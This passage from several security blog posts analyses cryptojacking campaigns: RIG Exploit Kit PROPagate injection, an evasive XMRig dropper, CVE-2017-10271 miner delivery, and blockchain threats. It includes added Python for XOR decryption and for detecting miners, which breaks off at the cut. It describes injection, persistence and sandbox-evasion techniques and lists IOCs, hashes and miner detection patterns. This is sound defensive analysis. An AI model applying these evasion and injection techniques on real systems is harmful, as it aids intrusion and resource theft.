  • Blocking domains known to have hosted coin mining scripts
  • Blocking websites of known mining project websites, such as Coinhive
  • Blocking scripts altogether
  • Using an ad-blocker or coin mining-specific browser add-ons
  • Detecting commonly used naming conventions
  • Alerting and blocking traffic destined for known popular mining pools

Some of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.

It is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.

Outlook

In underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, which we expect to remain a focus throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as compared to other forms of fraud or theft. Further, victims may not realize their computer is infected beyond a slowdown in system performance.

Due to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.

Because of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.

RIG Exploit Kit Delivering Monero Miner Via PROPagate Injection Technique

Introduction

Through FireEye Dynamic Threat Intelligence (DTI), we observed RIG Exploit Kit (EK) delivering a dropper that leverages the PROPagate injection technique to inject code that downloads and executes a Monero miner (similar activity has been reported by Trend Micro). Apart from leveraging a relatively lesser known injection technique, the attack chain has some other interesting properties that we will touch on in this blog post.

Attack Chain

The attack chain starts when the user visits a compromised website that loads the RIG EK landing page in an iframe. The RIG EK uses various techniques to deliver the NSIS (Nullsoft Scriptable Install System) loader, which leverages the PROPagate injection technique to inject shellcode into explorer.exe. This shellcode executes the next payload, which downloads and executes the Monero miner. The flow chart for the attack chain is shown in Figure 1.


Figure 1: Attack chain flow chart

Exploit Kit Analysis

When the user visits a compromised site that is injected with an iframe, the iframe loads the landing page. The iframe injected into a compromised website is shown in Figure 2.


Figure 2: Injected iframe

The landing page contains three different JavaScript snippets, each of which uses a different technique to deliver the payload. None of these techniques is new, so we will only give a brief overview of each one in this post.

JavaScript 1

The first JavaScript has a function, fa, which returns a VBScript that will be executed using the execScript function, as shown by the code in Figure 3.


Figure 3: JavaScript 1 code snippet

The VBScript exploits CVE-2016-0189 which allows it to download the payload and execute it using the code snippet seen in Figure 4.


Figure 4: VBScript code snippet

JavaScript 2

The second JavaScript contains a function that will retrieve additional JavaScript code and append this script code to the HTML page using the code snippet seen in Figure 5.


Figure 5: JavaScript 2 code snippet

This newly appended JavaScript exploits CVE-2015-2419, a vulnerability in JSON.stringify. The script obfuscates the call to JSON.stringify by storing pieces of the exploit in the variables shown in Figure 6.


Figure 6: Obfuscation using variables

Using these variables, the JavaScript calls JSON.stringify with malformed parameters in order to trigger CVE-2015-2419 which in turn will cause native code execution, as shown in Figure 7.


Figure 7: Call to JSON.Stringify

JavaScript 3

The third JavaScript has code that adds additional JavaScript, similar to the second JavaScript. This additional JavaScript adds a flash object that exploits CVE-2018-4878, as shown in Figure 8.


Figure 8: JavaScript 3 code snippet

Once the exploitation is successful, the shellcode invokes a command line to create a JavaScript file with filename u32.tmp, as shown in Figure 9.


Figure 9: WScript command line

This JavaScript file is launched using WScript, which downloads the next-stage payload and executes it using the command line in Figure 10.


Figure 10: Malicious command line

Payload Analysis

For this attack, the actor has used multiple payloads and anti-analysis techniques to bypass the analysis environment. Figure 11 shows the complete malware activity flow chart.


Figure 11: Malware activity flow chart

Analysis of NSIS Loader (SmokeLoader)

The first payload dropped by the RIG EK is a compiled NSIS executable famously known as SmokeLoader. Apart from NSIS files, the payload has two components: a DLL, and a data file (named ‘kumar.dll’ and ‘abaram.dat’ in our analysis case). The DLL has an export function that is invoked by the NSIS executable. This export function has code to read and decrypt the data file, which yields the second stage payload (a portable executable file).

The DLL then spawns itself (dropper) in SUSPENDED_MODE and injects the decrypted PE using process hollowing.

Analysis of Injected Code (Second Stage Payload)

The second stage payload is a highly obfuscated executable. It consists of a routine that decrypts a chunk of code, executes it, and re-encrypts it.

At the entry point, the executable contains code that checks the OS major version, which it extracts from the Process Environment Block (PEB). If the OS version value is less than 6 (prior to Windows Vista), the executable terminates itself. It also contains code that checks whether the executable is in debugged mode, which it extracts from offset 0x2 of the PEB. If the BeingDebugged flag is set, the executable terminates itself.

The malware also implements an Anti-VM check by opening the registry key HKLM\SYSTEM\ControlSet001\Services\Disk\Enum with value 0.

It checks whether the registry value data contains any of the strings: vmware, virtual, qemu, or xen. Each of these strings is indicative of a virtual machine.

After running the anti-analysis and environment check, the malware starts executing the core code to perform the malicious activity.

The malware uses the PROPagate injection method to inject and execute the code in a targeted process. The PROPagate method is similar to the SetWindowLong injection technique. In this method, the malware uses the SetPropA function to modify the callback for UxSubclassInfo and cause the remote process to execute the malicious code.

This code injection technique only works for a process with lesser or equal integrity level. The malware first checks whether the integrity of the current running process is medium integrity level (2000, SECURITY_MANDATORY_MEDIUM_RID). Figure 12 shows the code snippet.


Figure 12: Checking integrity level of current process

If the process is higher than medium integrity level, then the malware proceeds further. If the process is lower than medium integrity level, the malware respawns itself with medium integrity.

The malware creates a file mapping object and writes the dropper file path to it; the injected code later accesses the same mapping object to read the dropper file path and delete the dropper file. The name of the mapping object is derived from the volume serial number of the system drive and an XOR operation with a hardcoded value (Figure 13).

File Mapping Object Name = “Volume Serial Number” + “Volume Serial Number” XOR 0x7E766791


Figure 13: Creating file mapping object name

The malware then decrypts the third stage payload using XOR and decompresses it with RtlDecompressBuffer. The third stage payload is also a PE executable, but the author has modified the header of the file to avoid it being detected as a PE file in memory scanning. After restoring several header fields at the start of the decrypted data, we can recover the proper executable header (Figure 14).


Figure 14: Injected executable without header (left), and with header (right)

After decrypting the payload, the malware targets the shell process, explorer.exe, for malicious code injection. It uses GetShellWindow and GetWindowThreadProcessId APIs to get the shell window’s thread ID (Figure 15).


Figure 15: Getting shell window thread ID

The malware injects and maps the decrypted PE in a remote process (explorer.exe). It also injects shellcode that is configured as a callback function in SetPropA.

After injecting the payload into the target process, it uses the EnumChild and EnumProps functions to enumerate all entries in the property list of the shell window and compares each with UxSubclassInfo.

After finding the UxSubclassInfo property of the shell window, it saves the handle info and uses it to set the callback function through SetPropA.

SetPropA has three arguments, the third of which is the data. The callback procedure address is stored at offset 0x14 from the beginning of that data. The malware overwrites the callback address with the injected shellcode address (Figure 16).


Figure 16: Modifying callback function

The malware then sends a specific message to the window to execute the callback procedure corresponding to the UxSubclassInfo property, which leads to the execution of the shellcode.

The shellcode contains code to execute the address of the entry point of the injected third stage payload using CreateThread. It then resets the callback for SetPropA, which was modified by malware during PROPagate injection. Figure 17 shows the code snippet of the injected shellcode.


Figure 17: Assembly view of injected shellcode

Analysis of Third Stage Payload

Before executing the malicious code, the malware performs anti-analysis checks to make sure no analysis tool is running in the system. It creates two threads that run indefinitely and contain the code implementing these anti-analysis checks.

The first thread enumerates the processes using CreateToolhelp32Snapshot and checks for the process names generally used in analysis. It generates a DWORD hash value from the process name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the corresponding process.

The second thread enumerates the windows using EnumWindows. It uses GetClassNameA function to extract the class name associated with the corresponding window. Like the first thread, it generates a DWORD hash value from the class name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the process related to the corresponding window.

Other than these two anti-analysis techniques, it also has code to check the internet connectivity by trying to reach the URL: www.msftncsi[.]com/ncsi.txt.

To remain persistent on the system, the malware installs a scheduled task and a shortcut file in the %startup% folder. The scheduled task is named “Opera Scheduled Autoupdate {Decimal Value of GetTickCount()}”.

The malware then communicates with the malicious URL to download the final payload, which is a Monero miner. It creates an MD5 hash value using the Microsoft CryptoAPIs from the computer name and the volume information and sends the hash to the server in a POST request. Figure 18 shows the network communication.


Figure 18: Network communication

The malware then downloads the final payload, the Monero miner, from the server and installs it in the system.

Conclusion

Although we have been observing a decline in Exploit Kit activity, attackers are not abandoning them altogether. In this blog post, we explored how RIG EK is being used with various exploits to compromise endpoints. We have also shown how the NSIS Loader leverages the lesser known PROPagate process injection technique, possibly in an attempt to evade security products.

FireEye MVX and the FireEye Endpoint Security (HX) platform detect this attack at several stages of the attack chain.

Acknowledgement

We would like to thank Sudeep Singh and Alex Berry for their contributions to this blog post.

Evasive Monero Miners: Deserting the Sandbox for Profit

Authored by: Alexander Sevtsov
Edited by: Stefano Ortolani

Introduction

It’s not news that the cryptocurrency industry is on the rise. Mining crypto coins offers anybody a lucrative way to exchange computing resources for profit: every time a miner guesses the solution to a complex mathematical puzzle, they are rewarded with a newly minted crypto coin. While some cryptocurrencies are based on puzzles that are efficiently solved by special-purpose devices (such as Bitcoin on ASICs), others are still mined successfully on commodity hardware.

One in particular is the Monero (XMR) cryptocurrency. Besides being efficiently mined on standard CPUs and GPUs, it is also anonymous, or fungible to use the precise Monero term. This means that while it is easy to trace transactions between several Bitcoin wallets, a complex system relying on ring signatures ensures that Monero transactions are difficult if not impossible to trace, effectively hiding the origin of a transaction. Because of this, it should come as no surprise that the Monero cryptocurrency is also used for nefarious purposes, often mined by rogue JavaScript or by binaries downloaded onto and running on an unsuspecting user’s system.

Recent statistics show that 5% of all Monero coins are mined by malware. While the security industry is responding to this cryptojacking phenomenon by introducing new improved detection techniques, developers of these binaries began to replicate the modus operandi of ransomware samples: they started embedding anti-analysis techniques to evade detection as long as possible. In this blog article, we highlight some of our findings when analyzing a variant of the XMRig miner, and share insights about some evasion tricks used to bypass dynamic analysis systems.

Dropper

The sample (sha1: d86c1606094bc9362410a1076e29ac68ae98f972) is an obfuscated .NET application that uses a simple crypter to load an embedded executable at runtime using the Assembly.Load method. The following XOR key is used for its decryption:

50 F5 96 DF F0 61 77 42 39 43 FE 30 81 95 6F AF

Execution is later transferred via the EntryPoint.Invoke method to its entry point, after which another binary resource is decrypted. Figure 1 shows the encryption (AES-256) and the key derivation (PBKDF2) algorithms used to decrypt the binary.
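As an added illustration, not code from the Lastline post or from the sample itself, the following Python reproduces the repeating-key XOR step an analyst would apply to the embedded resource using the 16-byte key listed above, and sanity-checks the result as a PE image before trusting it. The "encrypted resource" is constructed inline (a minimal DOS/PE header run through the same key), because the real resource bytes are not on the page; the function and variable names are the example's own.

```python
# XOR key as listed in the analysis (16 bytes, repeating).
XOR_KEY = bytes.fromhex("50F596DFF06177423943FE3081956FAF")


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check that a decrypted blob is a PE image: 'MZ' DOS
    signature, and e_lfanew (offset 0x3C) pointing at the 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def make_constructed_plaintext() -> bytes:
    """Stand-in for the embedded executable (constructed, not the real sample):
    a minimal DOS header whose e_lfanew points at a PE signature."""
    buf = bytearray(0x80)
    buf[0:2] = b"MZ"
    buf[0x3C:0x40] = (0x40).to_bytes(4, "little")
    buf[0x40:0x44] = b"PE\x00\x00"
    body = b"constructed sample body"
    buf[0x44:0x44 + len(body)] = body
    return bytes(buf)


# Constructed "encrypted resource": the stand-in image run through the key above.
SAMPLE_RESOURCE = xor_with_key(make_constructed_plaintext(), XOR_KEY)


def decrypt_resource(blob: bytes = SAMPLE_RESOURCE, key: bytes = XOR_KEY) -> bytes:
    """Decrypt an XOR-obfuscated resource and refuse to return anything that does
    not parse as a PE image (wrong key, wrong resource offset, wrong resource)."""
    plain = xor_with_key(blob, key)
    if not looks_like_pe(plain):
        raise ValueError("decrypted data is not a PE image; check key or resource offset")
    return plain


if __name__ == "__main__":
    pe = decrypt_resource()
    e_lfanew = int.from_bytes(pe[0x3C:0x40], "little")
    print("recovered %d bytes, e_lfanew=0x%x" % (len(pe), e_lfanew))
```

The PE check matters in practice: when the key or the resource offset is wrong, XOR still "succeeds" and hands back garbage, so a structural check on the output is the only signal that the extraction went right.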

Figure 1. AES decryption routine of the embedded file; note the PBKDF2 key derivation.

The decrypted data consists of yet another executable. We can see it in Figure 2 surrounded by some strings already giving away some of the functionalities included (in particular, note the CheckSandbox and CheckVM strings, most likely indicating routines used to detect whether the sample is run inside an analysis environment).

Figure 2. Decrypted binary blob with an embedded executable file.

As the reader can imagine, we are always interested in discovering novel evasion techniques. With piqued curiosity, we decided to dive into the code a bit further.

Payload

After peeling off all encryption layers, we finally reached the unpacked payload (see Figure 3). As expected, we found quite a number of anti-analysis techniques.

Figure 3. The unpacked payload (sha1: 43f84e789710b06b2ab49b47577caf9d22fd45f8) as found in VT.

The most classic trick (shown in Figure 4) merely checked for known anti-analysis processes. For example, Process Explorer, Process Monitor, etc., are all tools used to better understand which processes are running, how they are spawned, and how much CPU resources are consumed by each executing thread. This is a pretty standard technique to hide from such monitoring tools, and it has been used by other crypto miners as well. As we will see, others were a bit more exotic.

Figure 4. Detecting known process monitoring tools via GetWindowTextW.

Evasion Technique – Lack of User Input

This technique specifically targets dynamic analysis systems. It tries to detect whether it is executing on a real host by measuring the amount of input received by the operating system. Admittedly, this is not that rare, and we indeed covered it before in a previous article describing some evasion techniques as used by ransomware.

Figure 5. Detecting sandbox by checking the last user input via GetLastInputInfo.

Figure 5 shows the logic in more detail: the code measures the time interval between two subsequent inputs. Anything longer than one minute is considered an indicator that the binary is running inside a sandbox. Note that besides being prone to false positives, this technique can easily be circumvented by simulating random user interactions.

Evasion Technique – Multicast IcmpSendEcho

The second anti-analysis technique that we investigated delays execution via the IcmpCreateFile and IcmpSendEcho APIs. As detailed in Figure 6, they are used to ping a reserved multicast address (224.0.0.0) with a timeout of 30 seconds. Since no reply is expected (interestingly enough, we know of some devices that erroneously reply to those ICMP packets), the IcmpSendEcho call blocks until the timeout expires, which has the side effect of pausing the executing thread for 30 seconds.

Figure 6. Delaying the execution via IcmpSendEcho API.

It’s worth noting that a similar trick has previously been used by some infected CCleaner samples. In that case, the malicious shellcode went a step further by checking whether the timeout parameter had been patched in an attempt to accelerate execution (and thus counter the anti-analysis technique).

Conclusions

Any dynamic analysis system wishing to cope with advanced evasive malware must be able to unpack layers of encryption and counter basic anti-analysis techniques. In Figure 7 we can see all the behaviors extracted when fully executing the original sample: the final payload is recognized as a variant of the XMRig Monero CPU Miner, and its network traffic correctly picked up and marked as suspicious.

Figure 7. Lastline analysis of the XMRig CPU miner.

Nevertheless, it is quite worrying that anti-analysis techniques are becoming this mainstream, so much so that they have started to turn into a standard feature of potentially unwanted applications (PUA) as well, including crypto-miners. Hopefully, this is just an isolated case, and not the first of a long series of techniques borrowed from the ransomware world.

Appendix – IOCs

Below the reader can find all the hashes related to this analysis, including the mutex identifying this specific strain, and the XMR wallet.

Sha1 (sample): d86c1606094bc9362410a1076e29ac68ae98f972
Sha1 (payload): 43f84e789710b06b2ab49b47577caf9d22fd45f8
Mutex: htTwkXKgtSjskOUmArFBjXWwLccQgxGT
Wallet: 49ptuU9Ktvr6rBkdmrsxdwiSR5WpViAkCXSzcAYWNmXcSZRv37GjwMBNzR7sZE3qBDTnwF9LZNKA8Er2JBiGcKjS6sPaYxY

The post Evasive Monero Miners: Deserting the Sandbox for Profit appeared first on Lastline.

Blockchain 101: What Consumers Need to Know About the Technology

From Bitcoin’s boom, to high stakes hacks – cryptocurrency, and how to secure it, has been the talk of the town. However, what most don’t realize is that there is a sophisticated technology involved in each cryptocurrency transaction, designed to secure digital currency: blockchain technology. Now, many of you may be asking – what exactly is blockchain? Let’s take a look at how this technology actually works and what the security implications may be for consumers.

What is blockchain?

According to the recent McAfee Blockchain Threat Report, “a blockchain is a series of records or transactions, collected together in a block that defines a portion of a ledger. The ledger is distributed among peers, who use it as a trusted authority in which records are valid. Each block in the ledger is linked to its next block, creating a chain—hence the name.” With blockchain, anyone can look at the latest blocks and their “parent” blocks to determine the state of an address. It also assists with multiple issues that can occur when making digital transactions, such as double spending and currency reproduction.

Remaining cautious with blockchain

Blockchain is essentially the secret weapon behind cryptocurrency’s popularity, as it has been positioned as the technology that will help address digital currency’s security issues. While it has great potential, there are some possible risks that could hinder its growth. For instance, the many cryptocurrency hacks we’ve seen recently have proven blockchain is not exactly foolproof. The mechanism involved in blockchain has some vulnerability in itself – which is a friendly reminder that we still need to be cautious in how we view this technology as it relates to security. Remember that blockchain is created by people, who can make mistakes.

Therefore, it’s important we all remain cautious when it comes to treating this technology like the end all be all. So, if you’re considering using blockchain technology to secure your cryptocurrency, be sure to follow these tips:

  • Don’t put all your eggs in one basket. Diversity is king when it comes to cryptocurrency. Since blockchain isn’t a sure-fire way for securing cryptocurrency transactions, make sure you do your research on the various “coins” out there. Select a nice variety of currency types so that if one cryptocurrency is attacked, you’ll still have a few other types to rely on.
  • Always have a plan B. Make sure you have a paper equivalent of records so that all your transactions are not bound by something that is prone to human error. That way, if for some reason something does go wrong with blockchain, you still have your important transactions documented elsewhere.
  • Do your homework. With blockchain, and any new and emerging technology really, make sure you always remain a bit skeptical. Do your homework before you embrace the technology – research your options and make sure there have been no security issues.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Blockchain 101: What Consumers Need to Know About the Technology appeared first on McAfee Blogs.

Threat Report: Don’t Join Blockchain Revolution Without Ensuring Security

On May 19 researchers discovered a series of vulnerabilities in the blockchain-based EOS platform that can lead to remote control over participating nodes. Just four days prior, a mining pool server for the IoT platform HDAC was compromised, impacting the vast majority of its miners. In January the largest-ever theft of cryptocurrencies occurred against the exchange Coincheck, resulting in the loss of US$532 million in NEM coin. Due to blockchain’s increased popularity and profitability, cybercriminals have been targeting all things blockchain. McAfee Advanced Threat Research team analysts have now published the McAfee Blockchain Threat Report to explain current threats against the users and implementers of blockchain technologies.

What is Blockchain?

Even if you have not heard of blockchain, you have likely heard of cryptocurrencies, namely Bitcoin, the most popular implementation. In late 2017 Bitcoin reached a value of $20,000 per coin, prompting a lot of interest in the currency—including from cybercriminals. Cryptocurrencies are built on top of blockchain, which records transactions in a decentralized way and enables a trusted “ledger” between trustless participants. Each block in the ledger is linked to the next block, creating a chain. Hence, the system is called a blockchain. The chain enables anyone to validate all transactions without going to an outside source. From this, decentralized currencies such as Bitcoin are possible.

Proof-of-work blockchain. Source: https://bitcoin.org/bitcoin.pdf.
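The two “What is blockchain?” passages above (this report’s and the Blockchain 101 post’s) describe a ledger whose blocks are linked by hashes and secured by proof of work. The following Python is an added teaching example, not code from McAfee or from any real blockchain implementation: it builds a small hash-linked chain, mines each block against a fixed difficulty (an assumption for the demo; real networks adjust it), validates the chain, and then shows why tampering with one block invalidates every block after it even if the tampered block is re-mined. That last point is also why a majority (51%) attack needs a majority of hash power: to rewrite history you must re-mine everything that follows faster than honest miners extend the chain.

```python
import copy
import hashlib
import json

# Demo difficulty: a valid block hash must start with this many zero hex digits.
DIFFICULTY = 2
GENESIS_PREV = "0" * 64


def block_hash(block):
    """Hash every field except the stored hash, using a canonical encoding so the
    same contents always produce the same digest."""
    payload = {k: block[k] for k in ("index", "prev_hash", "transactions", "nonce")}
    encoded = json.dumps(payload, sort_keys=True, separators=(",", ":")).encode()
    return hashlib.sha256(encoded).hexdigest()


def mine_block(index, prev_hash, transactions):
    """Proof of work: try nonces until the block hash meets the difficulty target."""
    nonce = 0
    while True:
        block = {"index": index, "prev_hash": prev_hash,
                 "transactions": transactions, "nonce": nonce}
        digest = block_hash(block)
        if digest.startswith("0" * DIFFICULTY):
            block["hash"] = digest
            return block
        nonce += 1


def build_chain(tx_batches):
    """Genesis block followed by one mined block per batch of transactions."""
    chain = [mine_block(0, GENESIS_PREV, [])]
    for txs in tx_batches:
        chain.append(mine_block(len(chain), chain[-1]["hash"], txs))
    return chain


def validate_chain(chain):
    """Return (ok, reason). Checks each block's index, its stored hash against
    its contents, its proof of work, and the link to its parent."""
    for i, block in enumerate(chain):
        if block["index"] != i:
            return False, f"block {i}: index mismatch"
        if block_hash(block) != block["hash"]:
            return False, f"block {i}: contents do not match stored hash"
        if not block["hash"].startswith("0" * DIFFICULTY):
            return False, f"block {i}: proof of work not satisfied"
        expected_prev = GENESIS_PREV if i == 0 else chain[i - 1]["hash"]
        if block["prev_hash"] != expected_prev:
            return False, f"block {i}: parent link broken"
    return True, "ok"


def demo():
    """Build a 3-block chain, rewrite a transaction in block 1, and show that
    re-mining only block 1 is not enough: block 2 still commits to the old hash."""
    chain = build_chain([
        [{"from": "alice", "to": "bob", "amount": 5}],
        [{"from": "bob", "to": "carol", "amount": 2}],
    ])
    ok_original = validate_chain(chain)[0]

    tampered = copy.deepcopy(chain)
    tampered[1]["transactions"][0]["amount"] = 500   # rewrite history
    ok_tampered = validate_chain(tampered)[0]        # stored hash no longer matches

    remined = copy.deepcopy(tampered)
    remined[1] = mine_block(1, remined[0]["hash"], remined[1]["transactions"])
    ok_remined = validate_chain(remined)[0]          # block 2's prev_hash is now stale

    return ok_original, ok_tampered, ok_remined


if __name__ == "__main__":
    print(demo())   # (True, False, False)
```

Peers that hold a copy of this ledger can run validate_chain on any chain they receive, which is the “trusted authority” property the report describes: validity is checked locally, not asserted by a third party.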

Blockchain Attacks

Attackers have adopted many methods targeting consumers and businesses. The primary attack vectors include phishing, malware, implementation vulnerabilities, and technology. In a phishing scheme in January, Iota cryptocurrency lost $4 million to scams that lasted several months. Malware authors often change their focus. In late 2017 to early 2018 some have migrated from deploying ransomware to cryptomining. They have been found using open-source code such as XMRig for system-based mining and the mining service Coinhive.

Source: McAfee Labs

Implementation vulnerabilities are the flaws introduced when new technologies and tools are built on top of blockchain. The recent EOS attack is one example. In mid-July 2017 Iota suffered an attack that essentially enabled attackers to steal from any wallet. Another currency, Verge, was found with numerous vulnerabilities. Attackers exploiting the vulnerabilities were able to generate coins without spending any mining power.

Known attacks against the core blockchain technology are much more difficult to implement, although they are not unheard of. The most widely known attack is the 51% attack, or majority attack, which enables attackers to create their own chains at will. The group 51 Crew targeted small coins, including Krypton, and held them for ransom. Another attack, known as a Sybil attack, can allow an attacker to completely control a targeted victim’s ledger. Attempts have been made for larger scale Sybil attacks such as one in 2016. 

Dictionary Attacks

Blockchain may be a relatively new technology but that does not mean that old attacks cannot work. Mostly due to insecure user behavior, dictionary attacks can leverage some implementations of blockchain. Brain wallets, or wallets based on weak passwords, are insecure, yet people still use them. These wallets are routinely stolen, as was the case with the nearly BTC60 stolen from the following wallet:

This wallet recorded two transactions as recently as March 5, 2018. One incoming and one outgoing transaction occurred within roughly 15 minutes. Source: https://blockchain.info.

Exchanges Under Attack

The biggest players, and targets, in blockchain are cryptocurrency exchanges. Cryptocurrency exchanges can be thought of as banks in which users create accounts, manage finances, and even trade currencies, including traditional ones. One of the most notable incidents is the attack against Mt. Gox between 2011‒2014 that resulted in $450 million of Bitcoin stolen and led to the liquidation and closure of the company. Coincheck, previously mentioned, survived the attack and began reimbursing victims for their losses in March 2018. Not all recently attacked exchanges fared so well. Bitcurex abruptly closed, leading to an official investigation into the circumstances; Youbit suffered two attacks, leading the company into bankruptcy.

An advertisement for the shuttered Polish exchange Bitcurex.

Conclusion 

Blockchain technologies and their users are heavily targeted by profit-driven cybercriminals. Current attackers are changing their tactics and new groups are entering the space. As more businesses look to blockchain to solve their business problems and consumers increasingly rely on these technologies, we must be diligent in understanding where the threats lie to achieve proper and tailored risk management. New implementations must place security at the forefront. Cybercriminals have already enjoyed successes against the users and implementations of blockchain, so we must prepare accordingly.

The post Threat Report: Don’t Join Blockchain Revolution Without Ensuring Security appeared first on McAfee Blogs.

CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining

Introduction

FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.

CVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a Critical Patch Update that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.

FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.

We saw evidence of organizations located in various countries – including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical – being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.

The recent cryptocurrency boom has resulted in a growing number of operations – employing diverse tactics – aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.

Tactic #1: Delivering the miner directly to a vulnerable server

Some tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1), and executing it using ShellExecute().


Figure 1: Downloading the payload directly

Tactic #2: Utilizing PowerShell scripts to deliver the miner

Other tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).


Figure 2: Exploit delivering PowerShell script

This script has the following functionalities:

  • Downloading miners from remote servers


Figure 3: Downloading cryptominers

As shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.

  • Creating scheduled tasks for persistence


Figure 4: Creation of scheduled task

  • Deleting scheduled tasks of other known cryptominers


Figure 5: Deletion of scheduled tasks related to other miners

In Figure 4, the cryptominer creates a scheduled task with the name “Update service for Oracle products1”. In Figure 5, a different variant deletes this task and other similar tasks after creating its own, “Update service for Oracle productsa”.

From this, it’s quite clear that different attackers are fighting over the resources available in the system.

  • Killing processes matching certain strings associated with other cryptominers


Figure 6: Terminating processes directly


Figure 7: Terminating processes matching certain strings

Similar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).

  • Connects to mining pools with wallet key


Figure 8: Connection to mining pools

The miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.

  • Limiting CPU usage to avoid suspicion


Figure 9: Limiting CPU Usage

To avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).
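Two things in this post, and one in the NSIS Loader analysis earlier on this page, are directly detectable from endpoint telemetry: the miner flags listed under Figure 8 (-o pool URL, -u wallet, with -a/-k/-p/-t as supporting evidence) and the scheduled task names “Update service for Oracle products1/productsa” here and “Opera Scheduled Autoupdate {GetTickCount()}” from the NSIS loader. The Python below is an added detection example, not FireEye’s code or a product rule: it scores process command lines and task-creation names from a constructed batch of events. The host name, port and wallet string in the sample events are made up for the example; only the task names and flag letters come from the page.

```python
import re

# Constructed telemetry: (event kind, detail). "process" entries are command lines
# from a process-creation log, "task" entries are names from task-creation events.
CONSTRUCTED_WALLET = "4" + "Wa11et" * 15    # 91 base58 chars, Monero-address length
SAMPLE_EVENTS = [
    ("process", r"C:\Windows\Temp\xmrig.exe -a cryptonight -k "
                f"-o stratum+tcp://pool.example.invalid:3333 -u {CONSTRUCTED_WALLET} -p x -t 2"),
    ("process", r"C:\Oracle\Middleware\jdk\bin\java.exe -server -Xms256m weblogic.Server"),
    ("process", r'powershell.exe -NoProfile -c "Get-Date"'),
    ("task", "Update service for Oracle products1"),
    ("task", "Update service for Oracle productsa"),
    ("task", "Opera Scheduled Autoupdate 1535103280"),
    ("task", r"Microsoft\Windows\WindowsUpdate\Scheduled Start"),
]

# Pool endpoint passed with -o (stratum scheme optional) and wallet passed with -u.
POOL_FLAG = re.compile(
    r"(?:^|\s)-o\s+(?:stratum\+(?:tcp|ssl)://)?([\w.-]+):(\d{2,5})(?=\s|$)", re.I)
WALLET_FLAG = re.compile(r"(?:^|\s)-u\s+([1-9A-HJ-NP-Za-km-z]{90,106})(?=\s|$)")
# Flags that are common to many tools; they raise confidence but never alert alone.
SUPPORTING_FLAGS = {
    "-a": re.compile(r"(?:^|\s)-a\s+\S+"),    # algorithm
    "-k": re.compile(r"(?:^|\s)-k(?=\s|$)"),  # keepalive
    "-p": re.compile(r"(?:^|\s)-p\s+\S+"),    # pool password
    "-t": re.compile(r"(?:^|\s)-t\s+\d+"),    # thread limit
}

TASK_PATTERNS = [
    (re.compile(r"^Update service for Oracle products\w?$"),
     "task name used by the CVE-2017-10271 miner scripts"),
    (re.compile(r"^Opera Scheduled Autoupdate \d+$", re.I),
     "task name pattern used by the NSIS loader (GetTickCount suffix)"),
]


def classify_cmdline(cmdline):
    """Return a finding for miner-like command lines, else None."""
    pool = POOL_FLAG.search(cmdline)
    wallet = WALLET_FLAG.search(cmdline)
    if not (pool or wallet):
        return None
    return {
        "verdict": "miner-like command line",
        "pool": f"{pool.group(1)}:{pool.group(2)}" if pool else None,
        "wallet": wallet.group(1) if wallet else None,
        "supporting_flags": [f for f, rx in SUPPORTING_FLAGS.items() if rx.search(cmdline)],
    }


def classify_task(task_name):
    """Return a finding for task names matching the patterns on this page, else None."""
    for rx, reason in TASK_PATTERNS:
        if rx.match(task_name):
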